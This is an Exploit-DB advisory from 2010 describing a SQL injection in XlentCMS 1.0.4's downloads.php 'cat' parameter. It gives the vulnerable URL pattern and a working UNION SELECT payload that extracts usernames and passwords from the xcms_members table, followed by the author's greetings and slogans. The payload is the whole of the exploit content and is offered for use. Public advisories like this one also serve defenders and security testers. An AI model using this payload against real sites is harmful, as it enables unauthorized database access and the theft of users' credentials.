XlentCMS 1.0.4 - 'downloads.php?cat' SQL Injection

EDB-ID:

10899

CVE:

N/A


Author:

Gamoscu

Type:

webapps


Platform:

PHP

Date:

2010-01-01


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

 Script      : XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability

 Script site : http://sphere.xlentprojects.se/portal.php 

 AUTHOR      : Gamoscu
   
 HOME        : http://www.1923turk.biz

 Blog        : http://gamoscu.wordpress.com/

 Greetz      : Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/downloads.php?cat=[SQL]

Example:

1+union+select+1,id,3,4,username%20,password,7,8,9+from+xcms_members--


Vatan Lafla De�il Eylemle Sevilir

Kiskananlar catlasin Zorunuza Gitmesin